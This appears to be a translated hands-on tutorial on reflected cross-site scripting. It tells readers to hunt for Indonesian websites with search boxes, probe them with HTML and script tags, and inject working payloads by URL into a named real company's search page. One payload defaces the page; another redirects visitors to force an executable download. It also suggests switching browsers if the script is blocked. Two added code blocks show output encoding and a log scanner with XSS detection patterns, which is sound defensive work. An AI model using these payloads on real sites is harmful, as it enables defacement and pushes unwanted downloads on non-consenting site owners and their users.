1 What is XSS?

Cross-site Scripting (abbreviated XSS) takes advantage of security vulnerabilities in website programs to inject code into the page's HTML. As a result, the malicious code is executed automatically, without the user intending it, when the page loads. After a successful attack, the attacker may obtain higher permissions, private information, cookies, and other contents.

XSS can be divided into:

  • Stored (persistent): the attacker injects the code directly into the server, which stores it in the database without filtering; every user receives the malicious code as soon as they open the page.
  • Non-persistent (reflected): the attacker constructs a URL containing malicious code and induces the user to click it. The server reads the parameters without filtering and concatenates them into the HTML, which the browser then executes.

2 Hands-on Process

2.1 Find websites with XSS vulnerability

Look for websites with a search box (pencarian, which means “search” in Indonesian).

2.2 Test each site to find a vulnerable one

Take the first website as the test target and enter <h1>TEST</h1> in the search box. If the site is vulnerable, the following page appears

This means the server does not filter the parameter and concatenates it directly into the HTML. To confirm this further, right-click and view the page source.

If <h1>TEST</h1> appears unchanged in the source, the server performs no filtering.

Next, return to the search box and enter <script>alert('x');</script>. If the site is vulnerable, the following page appears
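As an added example (not code from the original post), the following JavaScript shows the pattern the two probes above expose: a search page that splices the keyword parameter straight into its HTML, next to the same page with HTML-entity encoding applied before the value is inserted. The probe strings are the ones used in this section; the page template, the function names and the Indonesian heading text are constructed for the illustration.

```javascript
// Added example, not from the original post. Renders a "search results" page from the
// ?keyword= parameter two ways: raw concatenation (the behaviour the test above reveals)
// and with output encoding for HTML text context. Template and names are constructed.

// Encode the five characters that change meaning in HTML text or a double-quoted
// attribute. This is standard HTML-entity encoding, nothing site-specific.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the parameter is spliced directly into the markup.
function renderVulnerable(keyword) {
  return `<h2>Hasil pencarian untuk: ${keyword}</h2>`;
}

// Hardened: the same page, with the parameter encoded before insertion.
function renderSafe(keyword) {
  return `<h2>Hasil pencarian untuk: ${escapeHtml(keyword)}</h2>`;
}

// Check usable in a test suite: does the rendered page contain any tag that the
// template itself did not contribute? (The template only ever emits <h2>...</h2>.)
const TEMPLATE_TAGS = ["<h2>", "</h2>"];
function introducesTags(html, templateTags) {
  const tags = (html.match(/<\/?[a-zA-Z][^>]*>/g) || []).map((t) => t.toLowerCase());
  return tags.some((t) => !templateTags.includes(t));
}

// If an unencoded <script ...> element survives rendering, the browser would execute
// the parameter as code, which is exactly what the alert('x') probe demonstrates.
function reflectsScript(html) {
  return /<script[\s>]/i.test(html);
}

// The two probes from the post plus a harmless search term, for comparison.
const PROBES = ["<h1>TEST</h1>", "<script>alert('x');</script>", "Lampu LED"];

function demo() {
  for (const p of PROBES) {
    const bad = renderVulnerable(p);
    const ok = renderSafe(p);
    console.log("input      :", p);
    console.log("vulnerable :", bad, "| foreign tags:", introducesTags(bad, TEMPLATE_TAGS));
    console.log("hardened   :", ok, "| foreign tags:", introducesTags(ok, TEMPLATE_TAGS));
  }
}
demo();
```

The encoder above is correct only for the HTML text and quoted-attribute contexts; a value placed inside a JavaScript block, a URL, or a CSS rule needs the encoder for that context instead. Output encoding at the point of insertion is the fix; filtering the input for `<script>` on the way in is not, since the browser executes many other constructs. A Content-Security-Policy that disallows inline scripts limits the damage when an encoding step is missed.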

2.3 Executing a script by injecting code into the URL (Practice 1)

Change the URL to

https://www.sankelux.co.id/search?keyword=<script>document.body.innerHTML="THE SITE WAS HACKED"</script>

That is, the keyword parameter is set to a script, which executes with the following result

2.4 Executing a script by injecting code into the URL (Practice 2)

Change the URL to

https://www.sankelux.co.id/search?keyword=<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; </script>

The putty.exe file is automatically downloaded.

The keyword parameter can be replaced with any script to be executed.
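From the defender's side, requests like the ones in Practice 1 and 2 leave a clear trace in the web server's access log, because the whole payload travels in the query string. The following JavaScript is an added example (not code from the original post) that scans access-log lines for reflected-XSS probes. The log lines are constructed, the "keyword" parameter name follows the post, and the log layout is assumed to be the common Apache/nginx combined format.

```javascript
// Added example, not from the original post. Scans constructed access-log lines for
// query-string values that contain XSS probes like those shown in sections 2.2 to 2.4.
// Assumes the Apache/nginx "combined" log layout; the lines and addresses are made up.

const LOG_LINES = [
  '203.0.113.5 - - [10/May/2024:12:00:01 +0700] "GET /search?keyword=lampu HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/May/2024:12:00:09 +0700] "GET /search?keyword=%3Ch1%3ETEST%3C%2Fh1%3E HTTP/1.1" 200 5130 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/May/2024:12:00:20 +0700] "GET /search?keyword=%3Cscript%3Ealert(%27x%27)%3B%3C%2Fscript%3E HTTP/1.1" 200 5140 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/May/2024:12:01:00 +0700] "GET /search?keyword=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fexample.invalid%2Fa.exe%22%3B%3C%2Fscript%3E HTTP/1.1" 200 5140 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/May/2024:12:02:00 +0700] "GET /product/12 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
];

// Indicators in order of severity; the first match wins. These cover the probes used
// in the post (a bare tag, a script element) plus the other common inline-script
// vectors. A real deployment would use a maintained rule set and decode more deeply.
const INDICATORS = [
  { name: "script element",  re: /<\s*script\b/i },
  { name: "event handler",   re: /\bon[a-z]+\s*=/i },
  { name: "javascript: URL", re: /javascript\s*:/i },
  { name: "html tag",        re: /<\s*\/?\s*[a-z][^>]*>/i },
];

// Pull client address, timestamp and request target out of one combined-format line.
function parseRequest(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP\/[\d.]+"/);
  if (!m) return null;
  return { ip: m[1], time: m[2], target: m[3] };
}

// Percent-decode every query parameter (URLSearchParams does this) and test each value.
function inspectQuery(target) {
  // The base origin is a placeholder so URL() accepts a path-only request target.
  const url = new URL(target, "http://placeholder.invalid");
  const hits = [];
  for (const [name, value] of url.searchParams) {
    const ind = INDICATORS.find((i) => i.re.test(value));
    if (ind) hits.push({ param: name, value, indicator: ind.name });
  }
  return hits;
}

// Returns one finding per suspicious parameter, in log order.
function scanLogs(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseRequest(line);
    if (!req) continue;
    for (const h of inspectQuery(req.target)) {
      findings.push({ ip: req.ip, time: req.time, ...h });
    }
  }
  return findings;
}

for (const f of scanLogs(LOG_LINES)) {
  console.log(`${f.time} ${f.ip} ${f.indicator} in "${f.param}": ${f.value}`);
}
```

Two points worth keeping in mind when turning this into a real detection: a single decode misses double-encoded payloads (%253C), so decode until the value stops changing before matching, and the HTTP status in the log says nothing about whether the payload executed. The `<h1>TEST</h1>` line followed by the `<script>` line from the same address, a few seconds apart, is the signature of the manual test described in section 2.2 and is usually worth an alert on its own.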

2.5 Possible Problems

The browser may block the injected script. If the following occurs, switch to a different browser